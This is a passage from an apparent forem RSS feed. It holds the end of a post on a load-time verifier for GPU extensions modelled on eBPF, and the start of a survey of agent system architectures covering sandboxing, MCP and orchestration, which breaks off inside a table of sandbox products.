&lt;td&gt;&lt;strong&gt;By-construction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#2, #10, #15&lt;/td&gt;
&lt;td&gt;Perfect&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Static-sound&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#1, #3, #4, #5, #6, #11, #14, #16, #17, #18, #19&lt;/td&gt;
&lt;td&gt;Strong&lt;/td&gt;
&lt;td&gt;Low-Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Static-heuristic&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#7, #12&lt;/td&gt;
&lt;td&gt;Good&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Contract-based&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#8, #9&lt;/td&gt;
&lt;td&gt;Conditional&lt;/td&gt;
&lt;td&gt;Depends on contracts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dynamic-only&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;#13&lt;/td&gt;
&lt;td&gt;Executed paths only&lt;/td&gt;
&lt;td&gt;Coverage-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  The Three-Stage Verification Pipeline
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Stage 1: Load-time static verifier (core, analogous to eBPF verifier)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The load-time verifier employs three tiers of analysis, ranging from outright bans on genuinely dangerous constructs to static analysis that preserves useful functionality:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Tier A — By-construction bans (3 classes, no legitimate policy use):&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Ban warp sync primitives (#2) — mask correctness is unverifiable without ITS-aware analysis&lt;/li&gt;
&lt;li&gt;Ban spin-wait / polling loops (#10) — causes stale reads and ad-hoc synchronization&lt;/li&gt;
&lt;li&gt;Ban blocking primitives: locks, mutexes, named barriers (#15) — prevents non-barrier deadlocks&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;Tier B — Static-sound analysis (11 classes, allow but verify safe usage):&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Verification capability&lt;/th&gt;
&lt;th&gt;Bug classes covered&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Uniform control-flow analysis&lt;/td&gt;
&lt;td&gt;#1 barrier divergence, #4 warp-divergence race, #6 control-flow divergence&lt;/td&gt;
&lt;td&gt;Prove barriers are at uniform points; side-effects on uniform paths&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory access pattern analysis&lt;/td&gt;
&lt;td&gt;#5 uncoalesced access, #7 bank conflicts&lt;/td&gt;
&lt;td&gt;Check stride patterns; reject non-conforming index expressions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Race-freedom structural rules&lt;/td&gt;
&lt;td&gt;#11 shared-mem races, #17 global-mem races&lt;/td&gt;
&lt;td&gt;Per-lane sharding / lane0-only / atomic helpers + state isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scope enforcement&lt;/td&gt;
&lt;td&gt;#3 atomic scope&lt;/td&gt;
&lt;td&gt;Force device-scope for policy atomics + state isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pointer/memory safety&lt;/td&gt;
&lt;td&gt;#18 memory safety&lt;/td&gt;
&lt;td&gt;Restrict pointer operations, analogous to eBPF pointer verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Loop termination&lt;/td&gt;
&lt;td&gt;#16 non-termination&lt;/td&gt;
&lt;td&gt;Enforce bounded iteration counts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Range analysis&lt;/td&gt;
&lt;td&gt;#19 arithmetic errors&lt;/td&gt;
&lt;td&gt;Track value ranges to prevent overflow cascading into OOB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource budgets&lt;/td&gt;
&lt;td&gt;#14 atomic contention&lt;/td&gt;
&lt;td&gt;Limit atomic counts / enforce warp-aggregation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Tier C — Static-heuristic detection (2 classes, performance warnings/rejections):&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#7 bank conflicts → check shared-memory index stride against bank mapping&lt;/li&gt;
&lt;li&gt;#12 redundant barriers → dependence analysis to determine if a barrier protects actual cross-thread dependencies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Stage 2: Attach-time contract validation (2 classes)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#8 block-size dependence → policy declares preconditions (e.g., &lt;code&gt;requires: blockDim.x &amp;gt;= 128&lt;/code&gt;), validated when attaching to a specific kernel&lt;/li&gt;
&lt;li&gt;#9 launch config assumptions → validate grid/block dimensions satisfy policy preconditions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Stage 3: CI/Offline + Runtime (complementary coverage)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#13 host↔device async races → CuSan/TSan dynamic detection, beyond device-side verification scope&lt;/li&gt;
&lt;li&gt;GPUVerify/ESBMC-GPU for kernel+extension combined analysis (when source is available)&lt;/li&gt;
&lt;li&gt;Compute Sanitizer suite for dynamic regression testing&lt;/li&gt;
&lt;li&gt;iGUARD/Simulee for advanced race detection&lt;/li&gt;
&lt;li&gt;Runtime overhead enforcement for multi-tenant isolation (Guardian-style)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  The eBPF Lesson Applied to GPUs
&lt;/h4&gt;

&lt;p&gt;Just as eBPF succeeds by restricting extension capabilities to what can be verified without inspecting the kernel, a GPU extension verifier should:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Ban only what is genuinely dangerous and unnecessary&lt;/strong&gt; — warp sync, spin-wait, and blocking primitives have no legitimate use in policy code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use static analysis to allow useful features safely&lt;/strong&gt; — barriers, shared memory, and atomics are valuable; verify their safe usage rather than banning them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Isolate policy state&lt;/strong&gt; to reduce Combined bugs to Extension-local&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enforce warp-uniformity&lt;/strong&gt; for side effects, bounding SIMT-amplified overhead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use budgets&lt;/strong&gt; for performance-affecting resources (atomics, memory ops)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Require contracts&lt;/strong&gt; only for unavoidably Combined properties (#8, #9)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The key design principle is &lt;em&gt;not&lt;/em&gt; to ban everything that could go wrong, but to apply the right level of restriction for each risk: outright bans for constructs with no legitimate policy use, static verification for useful but dangerous features, and heuristic detection for performance concerns. This preserves policy expressiveness while maintaining soundness for safety-critical GPU extensions.&lt;/p&gt;




</description>
      <category>ebpf</category>
      <category>gpu</category>
      <category>verifier</category>
    </item>
    <item>
      <title>Architectures for Agent Systems: A Survey of Isolation, Integration, and Governance</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 03 Feb 2026 07:36:18 +0000</pubDate>
      <link>https://forem.com/yunwei37/architectures-for-agent-systems-a-survey-of-isolation-integration-and-governance-2185</link>
      <guid>https://forem.com/yunwei37/architectures-for-agent-systems-a-survey-of-isolation-integration-and-governance-2185</guid>
      <description>&lt;p&gt;Large Language Model (LLM) based agent systems – software that leverages LLMs to autonomously plan and execute multi-step tasks using external tools – are rapidly moving from proof-of-concept demos into enterprise deployment. These agents promise to automate coding, IT operations, data analysis, and more, but deploying them in production raises new challenges in security, reliability, and integration. Over the last half-year, the community has converged on key strategies: strong isolation for executing untrusted actions, standardized protocols for tool integration, and governance frameworks to align agent behavior with enterprise policies. This survey provides a systematic review of recent developments (roughly the latter half of 2025), including agent sandbox architectures, emerging standards like MCP, open-source projects, industry initiatives, and research advances. We focus on the pain points encountered when bringing agent systems to production and how the latest solutions address (or still fall short on) those needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Agent System Architecture in the Enterprise
&lt;/h2&gt;

&lt;p&gt;An enterprise-ready agent system typically consists of several layers: (i) an LLM-based reasoning core (the "agent" that decides which actions to take), (ii) an interface to invoke external tools or services (e.g. via APIs, command-line, databases), and (iii) an execution environment or runtime where the agent's tool actions (like running code or shell commands) actually occur. Surrounding these are components for memory/state storage, orchestration (especially if multiple agents work together), and monitoring &amp;amp; control (for safety and compliance). The overarching architectural challenge is that these systems are highly dynamic and open-ended: the agent may generate arbitrary code or tool requests at runtime, often based on unpredictable input. This requires a different approach to software architecture than traditional deterministic services.&lt;/p&gt;

&lt;p&gt;Isolation and Safety by Design. Unlike a bounded microservice, an AI agent might decide to execute unvetted code or make system-altering calls. A core architectural principle emerging in 2025 is to sandbox the agent's actions – running them in an isolated environment that protects the host system and network. For example, the open-source Agent Sandbox for Kubernetes was introduced as a new Kubernetes primitive to run AI agents safely. Instead of letting LLM-generated code run in a standard container (which could still abuse the host kernel or other pods), Agent Sandbox uses lightweight VMs (gVisor-based userland kernel, with optional Kata Containers support) to create a secure barrier between the agent's code and the cluster node's OS. This isolates potentially malicious or errant code from interfering with other applications or the host. The Sandbox is managed via a custom Kubernetes resource (CRD) called &lt;code&gt;Sandbox&lt;/code&gt;, which represents a single, stateful, long-lived pod with a stable identity and persistent storage. This design reflects a shift from treating agent workloads as ephemeral stateless functions to treating them as session-oriented services that may hold state over time. Indeed, the Agent Sandbox supports features like pausing and resuming the VM, automatically reviving it if a network reconnect is needed, and even memory sharing across sandboxes for efficiency. It also provides a templating and pool mechanism – &lt;code&gt;SandboxTemplate&lt;/code&gt; and &lt;code&gt;SandboxClaim&lt;/code&gt; – to manage pools of pre-warmed sandbox pods. Pre-warming is crucial because launching a fresh isolated VM can be slow; by keeping a pool of ready-to-go sandboxes, startup latency for a new agent session is dramatically reduced (Google reports sub-second startup latency, a ~90% improvement over cold-starting sandboxes). In Google's GKE, this is paired with a new Pod Snapshots feature that can checkpoint and restore running sandbox pods (even GPU workloads), cutting startup from minutes to seconds and avoiding idle resource waste. In short, the sandbox architecture is purpose-built for autonomous agents: it provides stronger isolation than ordinary containers, yet supports persistent state and fast elasticity to accommodate long-running, interactive agent tasks at scale.&lt;/p&gt;

&lt;p&gt;Stateful Singleton Runtimes. Traditional cloud apps often scale by running many stateless instances behind a load balancer, but agent use-cases (like an AI coding assistant or an autonomous scheduler) often manifest as a single specialized "worker" with memory (such as cached tools or context) that persists across many tool calls. The Kubernetes Agent Sandbox explicitly targets these singleton, stateful workloads – not just for AI agents but also things like CI/CD build agents or single-node databases that require stable identity and disk state. This reflects a broader industry recognition: agent applications need new runtime primitives that can maintain continuity of state and identity across a session (for example, so the agent can incrementally build on previous tool outputs, or maintain an authenticated session to a service). Recent designs propose durable execution for agents – the ability to pause an agent's process, snapshot its memory or file system, and later resume or even migrate it. The GKE Agent Sandbox + Pod Snapshot combo is an early real-world example of this, effectively treating an agent's environment as a checkpointable virtual machine. We anticipate emerging orchestration support where an agent can be hibernated when idle and quickly reawakened when needed, balancing responsiveness with efficient resource use.&lt;/p&gt;

&lt;p&gt;Tool Interface Layer. The other critical piece of architecture is how agents interface with external tools and data. Historically, each AI assistant platform invented its own plugin system or API schema (e.g. OpenAI's Plugins, LangChain's tool abstractions). This led to a fragmented ecosystem where tools had to be rewritten for each agent framework. Over 2025, a consensus has grown around Model Context Protocol (MCP) as a standard interface between AI models (the clients) and tools or services (the servers). MCP was released by Anthropic in late 2024 and by 2025 it has become "the universal standard protocol for connecting AI models to tools, data, and applications". Conceptually, MCP defines a simple JSON-RPC-based client-server protocol by which an AI agent can discover available tools and invoke them with arguments, and receive results/observations. The tools can be anything: database queries, file system operations, web requests, code compilation – each exposed by an MCP server that the agent connects to. The power of a common protocol is that it transforms the integration problem from M×N (every model integrating with every tool) to M+N modularity. A tool developer can create an MCP server once, and any compliant agent (whether it's OpenAI's, Anthropic's, or an open-source project) can use it. This dramatically reduces duplicated effort and makes the system more maintainable. GitHub engineers describe MCP as creating a "USB-C for AI" – a universal port for tools. In practice, MCP connections can be local (via stdio pipes) or remote (HTTP+SSE streams), and are typically stateful sessions, which aligns well with the idea of agent tools that maintain context (e.g. a database connection that stays open, or a browser that retains cookies).&lt;/p&gt;

&lt;p&gt;Orchestration and Multi-Agent Workflows. Many real tasks may be too complex for a single agent or might benefit from specialized agents collaborating. The architecture is therefore expanding to support multi-agent systems where agents communicate or coordinate. Some protocols, like Agent-to-Agent (A2A) messaging, are emerging to standardize inter-agent communication (for instance, Google's Agent2Agent protocol and Microsoft's adoption of A2A in their framework). In a multi-agent setup, you might have one agent that specializes in planning, another in executing code, another in validation, etc., passing context or subtasks among them. Orchestration frameworks now often support deterministic workflows (where the chain of sub-tasks is predefined, akin to a business process) alongside LLM-driven orchestration (where agents dynamically decide how to break down and assign tasks). For example, Microsoft's new open-source Agent Framework explicitly supports both Agent Orchestration (LLM-driven, creative, adaptive) and Workflow Orchestration (fixed logic, for reliable repeatability) within one runtime. This framework, released in late 2025, consolidates previous research prototypes (like Semantic Kernel's planner and AutoGen from MSR) into an enterprise-ready SDK. It emphasizes connectors to enterprise systems, open standards (MCP, A2A, OpenAPI), and built-in telemetry, approvals, and long-running durability to meet enterprise needs. The trend here is that agents are being treated as first-class components of software systems, with the same expectations for monitoring, security, and lifecycle management as microservices or human-in-the-loop workflows.&lt;/p&gt;

&lt;p&gt;Summary: The architecture of modern agent systems is coalescing around a modular, layered design. A secure sandboxed execution layer ensures that any generated code or commands run in isolation with controlled privileges. A standardized tool interface layer (MCP and similar protocols) decouples agent reasoning from the implementation of tools, enabling a rich ecosystem of reusable capabilities. On top of these, orchestration mechanisms allow composing multiple agents and tools into larger autonomous workflows, while providing hooks for humans and existing DevOps processes to supervise and intervene when needed. In the following sections, we delve deeper into three crucial aspects of enterprise agent systems: (a) the sandbox and runtime isolation mechanisms, (b) the emerging standards and ecosystems of tools/plugins, and (c) the security, governance, and observability considerations that are top-of-mind as organizations deploy these systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Isolated Execution Environments for Agents (Sandboxing)
&lt;/h2&gt;

&lt;p&gt;Running untrusted or machine-generated code has always been risky – the difference now is that with LLM agents the code is being generated and executed on the fly, without a human vetting each command. This opens the door to accidental failures or even malicious exploits if the agent is tricked or if its outputs are unsafe. As a result, sandboxing has become a foundational requirement for agent systems. Sandboxing in this context means confining the agent's actions (code execution, file system writes, network calls, etc.) to an environment where it can't harm other processes or breach data it shouldn't access.&lt;/p&gt;

&lt;h3&gt;
  
  
  Table 1: Research / OSS Projects (Papers, Benchmarks, Open-Source Runtimes)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Sandbox/Isolation Boundary&lt;/th&gt;
&lt;th&gt;Key Capabilities&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes SIGs: agent-sandbox&lt;/td&gt;
&lt;td&gt;OSS (K8s Primitives/Controller)&lt;/td&gt;
&lt;td&gt;Sandbox CRD in Kubernetes (with Template/Claim/WarmPool)&lt;/td&gt;
&lt;td&gt;Manage "isolated + stateful + singleton" workloads; standardized API for agent runtime&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/kubernetes-sigs/agent-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AIO Sandbox (agent-infra/sandbox)&lt;/td&gt;
&lt;td&gt;OSS (All-in-One Environment)&lt;/td&gt;
&lt;td&gt;Single Docker container (integrated multi-tools)&lt;/td&gt;
&lt;td&gt;Browser/Shell/File/MCP/VSCode Server unified; unified workspace for agents &amp;amp; dev&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/agent-infra/sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Alibaba OpenSandbox&lt;/td&gt;
&lt;td&gt;OSS (Universal Sandbox Platform)&lt;/td&gt;
&lt;td&gt;Unified protocol + multi-language SDK + sandbox runtime&lt;/td&gt;
&lt;td&gt;Universal sandbox foundation for command/file/code/browser/agent execution&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/alibaba/OpenSandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B (e2b-dev/E2B)&lt;/td&gt;
&lt;td&gt;OSS (Cloud Sandbox Infrastructure)&lt;/td&gt;
&lt;td&gt;Cloud-isolated sandbox (SDK controlled)&lt;/td&gt;
&lt;td&gt;Run AI-generated code in cloud; Python/JS SDK; for agent code interpreter&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/e2b-dev/E2B" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B Desktop (e2b-dev/desktop)&lt;/td&gt;
&lt;td&gt;OSS (Virtual Desktop Sandbox)&lt;/td&gt;
&lt;td&gt;Isolated virtual desktop environment&lt;/td&gt;
&lt;td&gt;"Computer Use" agent: desktop GUI, customizable dependencies, per-sandbox isolation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/e2b-dev/desktop" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM Sandbox (vndee/llm-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (Lightweight Code Sandbox)&lt;/td&gt;
&lt;td&gt;Containerized isolation (configurable security policies)&lt;/td&gt;
&lt;td&gt;Run LLM-generated code; customizable security policies and isolated container environments&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/vndee/llm-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SkyPilot Code Sandbox (alex000kim/…)&lt;/td&gt;
&lt;td&gt;OSS (Self-hosted Execution Service)&lt;/td&gt;
&lt;td&gt;SkyPilot deployment + Docker sandboxing&lt;/td&gt;
&lt;td&gt;Self-hosted, multi-language execution, token auth, MCP integration (for agent tools)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/alex000kim/skypilot-code-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsandbox (zerocore-ai/microsandbox)&lt;/td&gt;
&lt;td&gt;OSS (microVM Execution Environment)&lt;/td&gt;
&lt;td&gt;Hardware-isolated microVM (fast startup)&lt;/td&gt;
&lt;td&gt;Run untrusted workloads via microVM; emphasis on isolation strength and startup speed&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/zerocore-ai/microsandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ERA (BinSquare/ERA)&lt;/td&gt;
&lt;td&gt;OSS (Local microVM Sandbox)&lt;/td&gt;
&lt;td&gt;Local microVM ("microVM with container ease-of-use")&lt;/td&gt;
&lt;td&gt;Run untrusted/AI-generated code locally with hardware-level isolation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/BinSquare/ERA" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SandboxAI (substratusai/sandboxai)&lt;/td&gt;
&lt;td&gt;OSS (Runtime)&lt;/td&gt;
&lt;td&gt;Isolated sandbox&lt;/td&gt;
&lt;td&gt;Secure execution runtime for AI-generated Python code and shell commands&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/substratusai/sandboxai" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Python MCP Sandbox (JohanLi233/mcp-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (MCP Server)&lt;/td&gt;
&lt;td&gt;Docker container isolation&lt;/td&gt;
&lt;td&gt;Expose "secure Python execution" as a tool to agent/LLM clients via MCP&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/JohanLi233/mcp-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code Sandbox MCP (Automata-Labs-team/…)&lt;/td&gt;
&lt;td&gt;OSS (MCP Server)&lt;/td&gt;
&lt;td&gt;Docker container isolation&lt;/td&gt;
&lt;td&gt;MCP server: provide containerized secure code execution environment for AI applications&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/Automata-Labs-team/code-sandbox-mcp" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ToolSandbox (Apple)&lt;/td&gt;
&lt;td&gt;Research + OSS (Evaluation Benchmark)&lt;/td&gt;
&lt;td&gt;Evaluation sandbox with "stateful tool execution + user simulator"&lt;/td&gt;
&lt;td&gt;Evaluate LLM tool-use: state dependencies, multi-turn dialogue, dynamic evaluation; open-source&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/abs/2408.04682" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ToolEmu&lt;/td&gt;
&lt;td&gt;Research (Risk Evaluation Framework)&lt;/td&gt;
&lt;td&gt;LM-emulated sandbox (simulate tool execution with LM)&lt;/td&gt;
&lt;td&gt;Use LM to simulate tool execution for scalable agent risk testing; includes automatic safety evaluator&lt;/td&gt;
&lt;td&gt;&lt;a href="https://openreview.net/forum?id=GEcwtMk1uA" rel="noopener noreferrer"&gt;OpenReview&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HAICOSYSTEM&lt;/td&gt;
&lt;td&gt;Research + OSS (Safety Evaluation Ecosystem)&lt;/td&gt;
&lt;td&gt;Modular interaction sandbox (human-agent-tool multi-turn simulation)&lt;/td&gt;
&lt;td&gt;Multi-domain scenario simulation and multi-dimensional risk evaluation (operational/content/social/legal); code platform&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/abs/2409.16427" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EnterpriseBench&lt;/td&gt;
&lt;td&gt;Research (Enterprise Environment Evaluation Sandbox)&lt;/td&gt;
&lt;td&gt;"Evaluation environment" for enterprise tasks/tools/data&lt;/td&gt;
&lt;td&gt;Evaluate LLM agents in enterprise scenarios (task execution, tool dependencies, data retrieval)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managing Linux servers with LLM-based AI agents&lt;/td&gt;
&lt;td&gt;Research (Empirical Evaluation)&lt;/td&gt;
&lt;td&gt;Dockerized Linux sandbox&lt;/td&gt;
&lt;td&gt;Let agents execute server tasks in Dockerized Linux environment and evaluate performance&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.sciencedirect.com/science/article/pii/S266682702400046X" rel="noopener noreferrer"&gt;ScienceDirect&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-Programming Language Sandbox for LLMs&lt;/td&gt;
&lt;td&gt;Research (Multi-language Execution Sandbox)&lt;/td&gt;
&lt;td&gt;Container-isolated sub-sandbox&lt;/td&gt;
&lt;td&gt;Multi-language compilation/execution isolation (sub-sandbox isolated from main environment)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/html/2410.23074v1" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;awesome-sandbox (restyler/awesome-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (Ecosystem Overview/List)&lt;/td&gt;
&lt;td&gt;N/A (aggregation)&lt;/td&gt;
&lt;td&gt;Systematic curated list &amp;amp; analysis of "code sandboxing solutions"; good entry point for long-tail coverage&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/restyler/awesome-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: Achieving exhaustive coverage is impractical (especially given the long tail of the MCP ecosystem), so this table covers mainstream/representative projects plus ecosystem indexes. The &lt;code&gt;awesome-sandbox&lt;/code&gt; list serves as an entry point for additional coverage.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Table 2: Commercial / Cloud Service Projects (Agent Sandbox / Code Sandbox / Runtime)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Product/Service&lt;/th&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Isolation/Execution Model&lt;/th&gt;
&lt;th&gt;Key Capabilities&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Code Interpreter (Tools)&lt;/td&gt;
&lt;td&gt;OpenAI&lt;/td&gt;
&lt;td&gt;Managed Python sandbox execution&lt;/td&gt;
&lt;td&gt;Model writes and runs Python; for data analysis/coding/math&lt;/td&gt;
&lt;td&gt;&lt;a href="https://platform.openai.com/docs/guides/tools-code-interpreter" rel="noopener noreferrer"&gt;OpenAI Platform&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code Interpreter (Assistants on Azure)&lt;/td&gt;
&lt;td&gt;Microsoft Azure OpenAI&lt;/td&gt;
&lt;td&gt;Managed Python sandbox execution&lt;/td&gt;
&lt;td&gt;Assistants API runs Python in sandbox environment (per Azure docs)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://learn.microsoft.com/en-us/azure/ai-foundry/openai/how-to/code-interpreter" rel="noopener noreferrer"&gt;Microsoft Learn&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B (Managed Cloud)&lt;/td&gt;
&lt;td&gt;E2B&lt;/td&gt;
&lt;td&gt;Managed cloud sandbox (enterprise agent cloud)&lt;/td&gt;
&lt;td&gt;Sandbox as agent runtime; emphasis on concurrency and execution infrastructure&lt;/td&gt;
&lt;td&gt;&lt;a href="https://e2b.dev/" rel="noopener noreferrer"&gt;E2B&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Managed/platform sandbox infrastructure&lt;/td&gt;
&lt;td&gt;"Stateful infra for AI agents"; ultra-fast creation and isolated execution&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.daytona.io/" rel="noopener noreferrer"&gt;Daytona&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent Sandbox&lt;/td&gt;
&lt;td&gt;Novita AI&lt;/td&gt;
&lt;td&gt;Managed agent runtime&lt;/td&gt;
&lt;td&gt;Low startup latency, high concurrency; code execution/network access/browser automation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://novita.ai/sandbox" rel="noopener noreferrer"&gt;Novita AI&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sandboxes (Desktop / GUI)&lt;/td&gt;
&lt;td&gt;Bunnyshell&lt;/td&gt;
&lt;td&gt;Firecracker microVM virtual desktop&lt;/td&gt;
&lt;td&gt;For GUI/Computer Use: isolated desktop, VNC/noVNC, desktop automation API&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.bunnyshell.com/sandboxes/" rel="noopener noreferrer"&gt;Bunnyshell&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent Sandbox on GKE&lt;/td&gt;
